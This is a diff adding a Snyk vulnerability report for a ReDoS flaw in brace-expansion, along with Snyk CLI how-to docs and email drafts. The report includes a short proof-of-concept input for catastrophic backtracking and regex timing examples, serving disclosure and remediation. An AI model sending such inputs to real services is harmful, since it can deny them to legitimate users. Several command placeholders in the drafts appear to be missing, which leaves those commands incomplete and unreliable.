  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
+ +
+ +
+ +

Overview

+

brace-expansion is a Brace expansion as known from sh/bash

+

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in the expand() function, which is prone to catastrophic backtracking on very long malicious inputs.

+

PoC

+ 
import index from "./index.js";
+        
+        let str = "{a}" + ",".repeat(100000) + "\u0000";
+        
+        let startTime = performance.now();
+        
+        const result = index(str);
+        
+        let endTime = performance.now();
+        
+        let timeTaken = endTime - startTime;
+        
+        console.log(`匹配耗时: ${timeTaken.toFixed(3)} 毫秒`);
+
+

Details

+

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

+

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

+

Let’s take the following regular expression as an example:

+ 
regex = /A(B|C+)+D/
+
+

This regular expression accomplishes the following:

+
    +
  • A The string must start with the letter 'A'
    • +
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
    • +
  • D Finally, we ensure this section of the string ends with a 'D'
    • +
+

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

+

It most cases, it doesn't take very long for a regex engine to find a match:

+ 
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
+        0.04s user 0.01s system 95% cpu 0.052 total
+        
+        $ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
+        1.79s user 0.02s system 99% cpu 1.812 total
+
+

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

+

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

+

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

+
    +
  1. CCC
    2. +
  2. CC+C
    3. +
  3. C+CC
    4. +
  4. C+C+C.
    5. +
+

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

+

From there, the number of steps the engine must use to validate a string just continues to grow.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + +
StringNumber of C'sNumber of steps
ACCCX338
ACCCCX471
ACCCCCX5136
ACCCCCCCCCCCCCCX1465,553
+

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

+

Remediation

+

Upgrade brace-expansion to version 1.1.12, 2.0.2, 3.0.1, 4.0.1 or higher.

+

References

+ + +
+ +
+

More about this vulnerability

+
+ +
+
+
+
+ + + diff --git a/docs/container-scan-email-draft.txt b/docs/container-scan-email-draft.txt new file mode 100644 index 00000000000..12be50ce238 --- /dev/null +++ b/docs/container-scan-email-draft.txt @@ -0,0 +1,23 @@ +Subject: Running a local container scan with Snyk (build + monitor) + +Hi, + +Here's how to run a Snyk container scan on an image you build locally. It's a two-step process: build the image, then point Snyk at that same image name. + +Replace with your actual project name (e.g. nodejs-goof, my-app) everywhere below. + +Step 1 — Build the image and give it a name + +From your project directory (where the Dockerfile lives): + + docker build -t :local . + +The -t flag tags the image: "" is the name, "local" is the tag. After this, the image on your machine is called :local. + +Step 2 — Run Snyk container monitor on that image + + snyk container monitor :local --project-name="container/" + +Use the exact same image name you used in the build (:local). Snyk will scan that image and send the results to your dashboard under the project name you set with --project-name (container/). + +Summary: whatever you put after -t in the build is what you pass as the first argument to snyk container monitor. Use the same in both commands so the names match. diff --git a/docs/snyk-dashboard-upload-commands.md b/docs/snyk-dashboard-upload-commands.md new file mode 100644 index 00000000000..87b5085a888 --- /dev/null +++ b/docs/snyk-dashboard-upload-commands.md @@ -0,0 +1,69 @@ +# Snyk: Upload Local Scan Results to the Dashboard + +**Validation:** Command syntax verified. Use `snyk auth` or set `SNYK_TOKEN` if you get authentication errors. + +--- + +## Group under one target + scan-type project names + +Use the same **target** (e.g. `nodejs-goof`) so all scans appear together, and name **projects** by scan type (`sca/`, `sast`, `iac`, `container/`). + +- **Target** = the grouping in the dashboard (one per repo or per `--target-name`). +- **Project** = each scan under that target. + +Set `REPO_URL` to your repo (HTTPS). Example: +`REPO_URL=https://github.com/Snyk-Integration-App/nodejs-goof` + +**SCA (Open Source)** — same target via repo URL; set project name explicitly so it doesn’t default to `package.json` `"name"` (e.g. `goof`): +```bash +snyk monitor --all-projects --project-name-prefix="sca/" --remote-repo-url="$REPO_URL" +# If the UI still shows "goof", the project name is coming from package.json "name". Either: +# - Change "name" in package.json to "nodejs-goof", or +# - Run without --all-projects and set the name explicitly: +# snyk monitor --project-name="sca/nodejs-goof" --remote-repo-url="$REPO_URL" +``` + +**SAST (Snyk Code)** — set target name to `nodejs-goof`, project name `sast`: +```bash +snyk code test --report --target-name="nodejs-goof" --project-name="sast" +``` + +**IaC** — same target via repo URL; project name includes app name so it shows as e.g. `nodejs-goof/iac` (file name may still be appended by Snyk): +```bash +snyk iac test vulnerable.tf --report --remote-repo-url="$REPO_URL" --target-name="nodejs-goof/iac" +``` + +**Containers** — no `--remote-repo-url`/`--target-name` in CLI; the dashboard **group** (e.g. “node”) comes from the **image name** (e.g. `node:18-alpine`). Use `--project-name` so the project row is clear; the parent group name cannot be set from the CLI: +```bash +snyk container monitor --project-name="container/nodejs-goof" +``` +To see a different group name (e.g. “nodejs-goof”), monitor an image that includes that in its name (e.g. `your-registry/nodejs-goof:latest`) or rename the target in the Snyk UI if supported. + +**Result:** SCA and IaC share the same target (from `--remote-repo-url`, often shown as the repo path e.g. `Snyk-Integration-App/nodejs-goof`). SAST uses `--target-name="nodejs-goof"` so that target appears as `nodejs-goof`. You can rename the repo target to `nodejs-goof` in the Snyk UI (project/target settings) so everything reads the same. Container projects don’t support target linking in the CLI and may show in a separate group; their project name still identifies the scan type (`container/nodejs-goof`). + +--- + +## Minimal commands (no target grouping) + +**SCA (Open Source):** +```bash +snyk monitor --all-projects --project-name-prefix="sca/" +``` + +**SAST (Snyk Code):** +```bash +snyk code test --report --project-name="sast/projectname" +``` + +**IaC:** +```bash +snyk iac test . --report --target-name="nodejs-goof/iac" +``` +*Note: In current CLI (1.1300+), use `--target-name` for the project name; some versions use `--project-name`.* + +**Containers:** +```bash +snyk container monitor --project-name="container/projectname" +``` + +Run `snyk auth` first if you see authentication errors. diff --git a/docs/snyk-html-reports-email-draft.txt b/docs/snyk-html-reports-email-draft.txt new file mode 100644 index 00000000000..d61ecc4a384 --- /dev/null +++ b/docs/snyk-html-reports-email-draft.txt @@ -0,0 +1,33 @@ +Subject: How to generate Snyk HTML reports + +Hi, + +You can generate HTML reports from Snyk CLI by piping the JSON output into the snyk-to-html tool. Replace the placeholders with your own values. + +Install the converter once (globally): + + npm install snyk-to-html -g + +Then run your Snyk scan with --json and pipe it to snyk-to-html. Use -o to set the output HTML filename. + +Open Source (dependencies): + snyk test --json | snyk-to-html -o -opensource.html + +Code (SAST): + snyk code test --json | snyk-to-html -o -code.html + +Infrastructure as Code (Terraform, Kubernetes, CloudFormation, etc.): + snyk iac test --json | snyk-to-html -o -iac.html + +Container: + snyk container test --json | snyk-to-html -o -container.html + +Placeholders to replace: + — e.g. my-project, weekly-scan (used in the output filenames) + — e.g. . for current dir, or infra/, or path/to/terraform.tf + — e.g. myapp:latest or node:18-alpine (required for container) + +Run each command from your project root (or the directory that contains your manifests / Dockerfile). The HTML files are written in the current directory unless you use a path in -o (e.g. -o reports/code.html). + +Optional: to use a JSON 